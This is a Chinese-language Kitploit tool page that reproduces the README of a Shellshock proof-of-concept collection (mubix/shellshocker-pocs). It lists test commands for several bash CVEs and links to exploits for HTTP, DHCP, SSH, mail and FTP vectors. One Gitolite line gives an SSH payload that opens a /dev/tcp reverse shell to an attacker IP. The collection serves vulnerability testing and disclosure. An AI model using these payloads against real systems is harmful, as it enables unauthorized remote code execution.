Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
shellshocker-pocs — #ShellShocker 的概念验证与潜在目标合集 | Kitploit
工具/GitHubGitHub/mubix/shellshocker-pocs
漏洞扫描器漏洞分析漏洞利用Web应用程序漏洞利用渗透测试精选资源
GitHubmubix/shellshocker-pocs

shellshocker-pocs

#ShellShocker 的概念验证与潜在目标合集

查看仓库
889190116年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Shellshocker - "Shellshock" 概念验证代码仓库

#ShellShocker 的概念验证(PoC)与潜在目标集合

维基百科链接:https://en.wikipedia.org/wiki/Shellshock_%28software_bug%29#CVE-2014-7186_and_CVE-2014-7187_Details

如果你有更多链接或其他资源,请提交 pull request

推测:(未确认,可能存在漏洞)

  • XMPP(ejabberd)
  • Mailman - 已确认不存在漏洞
  • MySQL
  • NFS
  • Bind9
  • Procmail 参见
  • Exim 参见
  • Juniper Google 搜索inurl:inurl:/dana-na/auth/url_default/welcome.cgi
    • 来源:https://twitter.com/notsosecure/status/516132301025984512
    • 来源:http://kb.juniper.net/InfoCenter/index?page=content&id=JSA10648&actp=RSS
  • Cisco 设备
    • 来源:http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140926-bash
  • FreePB / Asterix 已在此修补

如果你知道以上任意项的 PoC,请提交带有链接的 issue 或 pull request。

命令行(Linux、OSX 以及通过 Cygwin 使用的 Windows)

  • bashcheck - 用于测试最新漏洞的脚本

CVE-2014-6271

  • env X='() { :; }; echo "CVE-2014-6271 vulnerable"' bash -c id

CVE-2014-7169

如果存在漏洞,将在当前工作目录中创建一个名为 echo 的文件,其中包含日期

  • env X='() { (a)=>\' bash -c "echo date"; cat echo

CVE-2014-7186

  • bash -c 'true <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF' || echo "CVE-2014-7186 vulnerable, redir_stack"

CVE-2014-7187

  • (for x in {1..200} ; do echo "for x$x in ; do :"; done; for x in {1..200} ; do echo done ; done) | bash || echo "CVE-2014-7187 vulnerable, word_lineno"

CVE-2014-6278

  • env X='() { _; } >_[$($())] { echo CVE-2014-6278 vulnerable; id; }' bash -c :
  • 更多信息:http://lcamtuf.blogspot.com/2014/10/bash-bug-how-we-finally-cracked.html

CVE-2014-6277

如果存在漏洞将导致段错误

  • env X='() { x() { _; }; x() { _; } <<a; }' bash -c :
  • 关于 fulldisclosure 的更多讨论:http://seclists.org/fulldisclosure/2014/Oct/9
  • 更多信息:http://lcamtuf.blogspot.com/2014/10/bash-bug-how-we-finally-cracked.html

IBM z/OS -

  • http://mainframed767.tumblr.com/post/98446455927/bad-news-is-it-totally-works-in-bash-on-z-os-and

HTTP

  • Metasploit 漏洞利用模块 - Apache mod_cgi Bash 环境变量代码注入(Shellshock)
  • Metasploit 漏洞利用模块 - Advantech 交换机 Bash 环境变量代码注入(Shellshock)
  • Metasploit 漏洞利用模块 - IPFire Bash 环境变量注入(Shellshock)
  • HTTP Header 污染(由 @irsdl 提供)- http://pastebin.com/QNkf7dYS
  • HTTP CGI-BIN - http://pastebin.com/166f8Rjx
  • cPanel - http://blog.sucuri.net/2014/09/bash-vulnerability-shell-shock-thousands-of-cpanel-sites-are-high-risk.html
  • Digital Alert Systems DASDEC - http://seclists.org/fulldisclosure/2014/Sep/107
  • F5 - https://twitter.com/securifybv/status/515035044294172673
    • https://twitter.com/securifybv/status/515035044294172673/photo/1
    • https://twitter.com/avalidnerd/status/515056463589675008
      • https://twitter.com/avalidnerd/status/515056463589675008/photo/1
  • Invisiblethreat.ca - https://www.invisiblethreat.ca/2014/09/cve-2014-6271/
  • 命令行版本 - https://gist.github.com/mfadzilr/70892f43597e7863a8dc
  • 基于 User-Agent 的演练(配合 LiveHTTPHeaders)- http://www.lykostech.net/lab-time-exploiting-shellshock-bash-bug-virtual-server/
  • 基于 User-Agent 的演练(配合 Burp)- http://oleaass.com/shellshock-proof-of-concept-reverse-shell/
  • 基于 User-Agent,但支持 Tor 和 Socks5(Python)- https://github.com/lnxg33k/misc/blob/master/shellshock.py
  • 基于 User-Agent,使用 Ruby 编写 - https://github.com/securusglobal/BadBash
  • 基于 Header 的简单扫描器,使用 sleep 并支持多线程 - https://github.com/gry/shellshock-scanner
  • shocker - 检查文件中的 URL 列表或单个 URL,对照已知易受攻击的 CGI 资源列表(Content-type 方法)
  • Xymon - https://lists.xymon.com/archive/2014-September/040350.html
  • QNAP - https://www.exploit-db.com/exploits/36503

Phusion Passenger

  • https://news.ycombinator.com/item?id=8369776

DHCP

  • 通过 Tftpd32 的 TrustedSec 漏洞利用 - https://www.trustedsec.com/september-2014/shellshock-dhcp-rce-proof-concept/
  • Metasploit 漏洞利用模块 - Dhclient Bash 环境变量注入(Shellshock)
  • Metasploit 辅助模块 - https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/server/dhclient_bash_env.rb
  • Perl 脚本 - http://pastebin.com/S1WVzTv9
  • 使用 Wi-Fi Pineapple 强制他人加入网络 - http://d.uijn.nl/?p=32

SSH

  • Stack Overflow - http://unix.stackexchange.com/questions/157477/how-can-shellshock-be-exploited-over-ssh
  • SSH ForcedCommand - https://twitter.com/JZdziarski/status/515205581226123264
    • https://twitter.com/JZdziarski/status/515205581226123264/photo/1
  • SendEnv: LC_X='() { :; }; echo vulnerable' ssh [email protected] -o SendEnv=LC_X
  • Gitolite - https://twitter.com/Grifo/status/515089986161766400
    • $ ssh GITOLITEUSER@VULNERABLEIP '() { ignore;}; /bin/bash -i >& /dev/tcp/REVERSESHELLIP/PORT 0>&1'
    • (需要在服务器上拥有 git 账户)

OSX

  • 通过 VMware Fusion 进行权限提升 - https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/osx/local/vmware_bash_function_root.rb
  • 修复:http://support.apple.com/kb/DL1769

OSX - 带反向 DNS(CVE-2014-3671.txt)

  • 示例区域文件:in-addr.arpa,其中包含 CVE-2014-6271 示例。
  • 示例文件:包含一个传递给 setenv() 的 getnameinfo():osx-rev-ptr.c
  • 安全公告,包含上述内容的描述 CVE-2014-3671.txt

SIP

  • SIP 代理:https://github.com/zaf/sipshock

Qmail

  • 详细演练 - http://marc.info/?l=qmail&m=141183309314366&w=2
  • 来自 @ymzkei5 的推文 - http://twitter.com/ymzkei5/status/515328039765307392
    • http://twitpic.com/ec3615
    • http://twitpic.com/ec361o

Postfix

  • http://packetstormsecurity.com/files/128572/postfixsmtp-shellshock.txt

FTP

  • Pure-FTPd:https://gist.github.com/jedisct1/88c62ee34e6fa92c31dc
  • Metasploit 漏洞利用模块 - Pure-FTPd 外部认证 Bash 环境变量代码注入(Shellshock)

OpenVPN

  • OpenVPN - https://news.ycombinator.com/item?id=8385332
  • 由 @fj33r 提供的 PoC 演练 - http://sprunge.us/BGjP

Oracle

  • 警报及受影响产品列表

TMNT

  • https://twitter.com/SynAckPwn/status/514961810320293888/photo/1

Hand

  • 来自 @DJManilaIce - http://pastie.org/9601055
user@localhost:~$ env X='() { (a)=>\' /bin/bash -c "shellshocker echo -e \"           __ __\n          /  V  \ \n     _    |  |   |\n    / \   |  |   |\n    |  |  |  |   |\n    |  |  |  |   |\n    |  |__|  |   |\n    |  |  \  |___|___\n    |  \   |/        \ \n    |   |  |______    |\n    |   |  |          |\n    |   \__'   /     |\n    \        \(     /\n     \             /\n      \|            |\n\""; cat shellshocker
/bin/bash: X: line 1: syntax error near unexpected token `='
/bin/bash: X: line 1: `'
/bin/bash: error importing function definition for `X'
           __ __
          /  V  \ 
     _    |  |   |
    / \   |  |   |
    |  |  |  |   |
    |  |  |  |   |
    |  |__|  |   |
    |  |  \  |___|___
    |  \   |/        \ 
    |   |  |______    |
    |   |  |          |
    |   \__'   /     |
    \        \(     /
     \             /
      \|            |

CUPS

  • Metasploit 漏洞利用模块 - CUPS 过滤器 Bash 环境变量代码注入
下载工具